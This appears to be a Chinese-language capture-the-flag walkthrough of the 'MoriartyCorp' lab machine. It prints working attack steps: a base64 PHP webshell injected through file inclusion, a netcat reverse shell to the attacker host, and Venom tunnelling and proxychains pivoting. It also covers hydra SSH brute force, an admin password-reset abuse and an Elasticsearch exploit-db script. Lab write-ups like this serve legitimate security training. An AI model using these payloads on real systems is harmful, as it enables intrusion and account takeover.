靶机介绍

1）靶机名称：3-Free-MoriartyCorp

2）难度级别：中-高

3）靶机背景介绍：

①你作为一名特工，协助调查世界最大军火商的非法交易

②本次靶机共有6个任务，每完成一个任务并提交flag,则解锁下一个任务

③8000端口用于提交flag和提示下一关信息，不得对8000端口展开攻击

④靶场环境基于Docker容器打造

⑤美观的flag都以#_flag.txt格式存在于目标系统中

⑥flag提交方式为flag{}

4）课程来源：https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0

5）靶机地址：链接：https://pan.baidu.com/s/1digsxLOoLd0LoQjrp4OZ8g 提取码：yk91

打靶过程：

1）因靶机通过仅主机方式与宿主机连接，因此可通过二层地址发现的方式，找到靶机的IP地址

#arp-scan -l 192.168.56.0/24

2)对靶机进行全端口扫描

# nmap -p- 192.168.56.106

3）通过靶机提示，方式IP:8000端口对应的web页面

4）通过上述页面提示，复制页面flag{start}开启靶机,开启第一个任务

5）通过上述页面提示，可以发现该靶机对公网开放了一个80端口，此时对80端口进行扫描

# nmap -p80 192.168.56.106

由此可以得出，靶机的处理方法：提交一个flag，就会开启下一关的任务

6）通过IP:80访问WEB页面，通过观察页面直接发现不了任何信息

7）通过点击Blog post 1或者Blog post 1，发现URL出现了变化

8）通过URL发现，该页面可能存在文件包含漏洞，对其进行 基本测试

http://192.168.56.106/?file=../../../../etc/passwd

通过测试发现，确实存在文件包含漏洞

9）对文件包含漏洞进行利用：加载自己的webshell,进行漏洞的反弹，在kali主机上获取一个反弹的shell

浏览器：
http://192.168.56.106/?file=data:/text/plain;base64,PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7IGVjaG8gJHZhciA/Pg==&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.103+1337+>/tmp/f

kali主机：
nc -lvvp 1337

10）通过反弹shell，输入命令，查看到在根用户下存在第一个flag文件

11）将获取到的flag，提交至IP：8000端口中，解锁一下任务

12）按照页面提示信息，下一任务是为了攻击该企业的内部网络，且内部网络地址范围为172.17.0.3-254

注：因为是内网地址段，所以通过kaLi无法直接访问到内网主机，此时可通过隧道代理的技术手段穿透内网，使得可以在kali主机上直接访问内容，此处使用Venom隧道连接工具

下载地址：https://github.com/Dliv3/Venom/releases

13）通过前期信息搜集发现目标主机是Linux主机，所以把针对Linux系统的代理客户端程序传输到目标服务器上，然后利用客户端程序与目标系统建立一条隧道，从而穿透内网，先Kali主机搭建web服务，将客户端程序下载至目标服务器

# cp agent_linux_x64 /var/www/html
# systemctl restart apache2

14）通过第十步反弹的webshell，下载客户端程序

$ wget http://192.168.56.103/agent_linux_x64

15）在kali主机启动隧道的服务端程序(监听9999端口)

# ./admin_linux_x64 -lport 9999

16）启动客户端程序，同时指定服务器端的Ip地址，kali服务器端的监听端口

 $ chmod +x agent_linux_x64
 $ ./agent_linux_x64 -rhost 192.168.56.103 -rport 9999

此时服务器显示连接成功

17）在服务器端，输入shouw命令，发现第一跳节点已出现，然后进入节点1，开启一个本地的sockes监听端口1080，这样就在kali服务端又开启一个监听端口

>>> show
>>> goto 1
>>> socks 1080

18）上述步骤完成后，在kali主机配置proxychains，利用proxychains的代理功能，让kali上的所有工具都可以利用代理去穿透目标系统的内网（在最后一行修改代理服务器的IP地址）

# vi /etc/proxychains4.conf
最后一行编辑：socks5 	127.0.0.1 1080
注释DNS代理：#proxy_dns

19）配置完成后，就可以挂着proxychains去扫描目标系统的内网，此处使用nmap扫描目标系统的内网网段的常用端口

# proxychains nmap 172.17.0.3-254 -p80,22,44

20）通过上述扫描发现开放了172.17.0.4:80，对其进行访问，访问时需要在浏览器配置代理

访问出现如下界面

21）在上述页面中，可以上传文件，但是上传文件时，需要输入密码，此时通过busuit对其进行暴力破解。问题：当浏览器把代理指向Burp后，浏览器就失去了穿透内网的能力，因为要访问内网，必须要挂之前建立前的隧道代理（socks代理），为解决该问题，需要在burp中配置二级代理

配置完成后，访问网页时，先通过burp代理，再通过socks代理

22）此时可正常访问,上传webshell文件，并进行提交，提交时通过Burp抓包

23）对密码进行暴力破解，破解出密码为password，同时可以查看到上传的目录

http://172.17.0.4/photo/22/shell.php

24）通过中国蚁剑进行webshell连接，需要先设置中国蚁剑的代理为socks代理，保存后，添加上述连接，连接至服务器后，即可获取到flag

蚁剑加载器：https://github.com/AntSwordProject/AntSword-Loader

蚁剑源码：https://gitcode.net/mirrors/antswordproject/antsword?utm_source=csdn_github_accelerator

25）将flag在IP:8000处进行提交，进入下一个任务，根据任务提示，页面告诉我们已经有一名特工已经进入目标服务器中，且在目标服务中发现了一些账号和密码，同时提示我们，目标系统上有一个SSH的server,可利用上述用户和密码登录至服务器中，但是目标ssh服务器的IP地址需要自己发现：现在内网中发现开启了22端口的主机172.17.0.5

#nmap -p22 -ST -Pn 172.17.0.3-254

26）形成用户名和密码文件

27）通过hydra进行暴力破解

# proxychains hydra -L users.txt -P password.txt ssh://172.17.0.5

28）通过ssh用户名和密码登录目标服务器后，查看到flag

flag{what_weapons}

29）通过上述提示可知某个主机没有开放80端口，但是开放了443,8000,8080,8888中的某个端口，继续通过扫描发现

#proxychains nmap -p443,8000,8080,8888 -sT -Pn 172.17.0.3-254

30）通过访问发现是一个类似聊天室的页面，输入上述提示中的用户名和密码

http://172.17.0.6:8000

31）点击上面chat按钮，发现了admin用户和buyer13的聊天记录

32）点击修改密码操作，发现此处存在任意密码修改漏洞，可以直接修改管理员密码：抓取数据包后，修改用户名为admin,修改admin用户名密码为123

33）重新访问网页，输入修改后的用户名和密码，在聊天室中发现了flag

34）通过上述提示发现，存在一个elasticsearch的服务器，因此对9200端口进行扫描

#proxychains nmap -p9200 -sT -Pn 172.17.0.3-20

35）通过浏览器进行访问,elasticsearch的版本

36）通过kali搜索elasticsearch的可能利用的漏洞

# searchsploit elasticsearch

37）利用代码，获取falg

# proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337 172.17.0.7